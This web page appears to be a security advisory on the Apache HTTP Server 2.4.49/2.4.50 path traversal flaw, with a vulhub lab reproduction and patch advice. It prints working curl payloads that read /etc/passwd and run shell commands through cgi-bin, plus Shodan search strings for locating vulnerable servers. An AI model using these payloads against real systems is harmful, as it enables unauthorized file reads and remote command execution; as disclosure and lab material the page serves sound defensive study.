Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the updraftplus domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /data/wwwroot/wordpress/wp-includes/functions.php on line 6121
Critical Path Traversal Vulnerability in Apache HTTP Server: Exploits in Versions 2.4.49 and 2.4.50 - Ax3soft

Critical Path Traversal Vulnerability in Apache HTTP Server: Exploits in Versions 2.4.49 and 2.4.50

Vulnerability Overview

There is a path traversal vulnerability in Apache HTTP Server. This vulnerability arises from the insufficient fix for CVE-2021-41773 in version 2.4.50 of Apache HTTP Server.

Attackers can exploit this vulnerability to read files located outside the web directory of the Apache server, read the source code of script files within the web directory, or execute arbitrary commands on servers with cgi or cgid enabled. This vulnerability affects both versions 2.4.49 and 2.4.50 of Apache HTTP Server.

Shodan Search Syntax

Apache/2.4.49
Apache/2.4.50
Apache HTTP Server vulnerability

Vulnerability Reproduction

cd vulhub/httpd/CVE-2021-42013
docker-compose up -d
Apache HTTP Server vulnerability

curl -v http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

Mitigation

  1. Upgrade Apache httpd to a higher version.
  2. The vendor has released an upgrade patch to fix the vulnerability. The patch can be obtained from the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ

Post Views:1,397 Appreciation